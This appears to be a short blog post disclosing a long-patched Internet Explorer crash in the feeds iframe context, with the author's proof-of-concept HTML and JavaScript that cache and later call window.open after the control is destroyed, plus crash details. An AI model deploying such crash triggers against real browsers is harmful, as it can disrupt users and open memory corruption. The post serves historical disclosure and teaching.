IE DoS — Cached window.open from Feeds IFrame Context

Loading feeds XML in an iframe causes IE to render it in a special WebBrowser control. Clicking a feed title loads a regular HTML page inside that WebBrowser. Saving a reference to window.open from that HTML, destroying the WebBrowser by changing the iframe URL, and then calling the cached open crashes IE with a PROBABLY_EXPLOITABLE rating in mshtml!SearchChildrenForWindow.

<iframe src="dummyfeeds.xml" width="600" height="100"></iframe>

<script language="JavaScript">
function main()
{
    window[0].location = "about:blank";
    setTimeout('cachedOpen("ANY_URL","ANY_NAME");', 1000);
}
</script>

<!-- cache_window_open.html: loaded inside the feeds WebBrowser after clicking a feed title -->
<script language="JavaScript">
    top.cachedOpen = window.open;
    top.execScript("main()");
</script>

The crash occurs at mshtml!SearchChildrenForWindow+0x32 — reading from ESI=0 (hash 0x622a757b.0x2f444845). Tested on IE8/Win7, IE7/Vista, and IE8/XP.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [WPF 4 Beta 2 Pentest] :: [DoS — XAML Nested in XAML via IFrame] >